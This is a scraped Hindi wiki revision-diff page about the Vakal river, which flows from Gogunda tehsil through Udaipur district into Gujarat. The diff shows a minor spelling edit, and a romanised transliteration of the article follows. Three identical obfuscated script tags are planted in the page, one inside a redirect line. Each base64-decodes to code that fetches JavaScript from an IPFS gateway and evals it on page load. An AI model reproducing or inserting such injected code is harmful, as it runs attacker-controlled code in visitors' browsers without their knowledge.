Difference between revisions of "वाकल नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''वाकल नदी''' राजस्थान में प्रवाहित होने वाली नदी है...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 2: Line 2:
  
 
*यह नदी ओघना व मानपुर नामक गाँवों से प्रवाहित होती हुई कोटड़ा पहुँचती है। यहाँ से यह नदी पश्चिम की ओर मुड़ जाती है।
 
*यह नदी ओघना व मानपुर नामक गाँवों से प्रवाहित होती हुई कोटड़ा पहुँचती है। यहाँ से यह नदी पश्चिम की ओर मुड़ जाती है।
*[[उदयपुर ज़िला|उदयपुर ज़िले]] में वाकल नदी 112 किलोमीटर प्रवाहित होने के पश्चात गाऊ पीपली नामक गाँव के निकट [[गुजरात|गुजरात राज्य]] में प्रवेश कर जाती है।
+
*[[उदयपुर ज़िला|उदयपुर ज़िले]] में वाकल नदी 112 किलोमीटर प्रवाहित होने के पश्चात् गाऊ पीपली नामक गाँव के निकट [[गुजरात|गुजरात राज्य]] में प्रवेश कर जाती है।
 
*इस नदी के किनारे उदयपुर ज़िले के राधोगढ़, ओघना, पनवाड़ा और कोटड़ा आदि गाँव स्थित हैं।
 
*इस नदी के किनारे उदयपुर ज़िले के राधोगढ़, ओघना, पनवाड़ा और कोटड़ा आदि गाँव स्थित हैं।
  

Latest revision as of 07:31, 7 November 2017

vakal nadi rajasthan mean pravahit hone vali nadi hai. yah nadi goguanda tahasil ke 'gora' namak gaanv ke nikat sthit paha diyoan se nikalati hai.

  • yah nadi oghana v manapur namak gaanvoan se pravahit hoti huee kot da pahuanchati hai. yahaan se yah nadi pashchim ki or mu d jati hai.
  • udayapur zile mean vakal nadi 112 kilomitar pravahit hone ke pashchath gaoo pipali namak gaanv ke nikat gujarat rajy mean pravesh kar jati hai.
  • is nadi ke kinare udayapur zile ke radhogadh, oghana, panava da aur kot da adi gaanv sthit haian.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>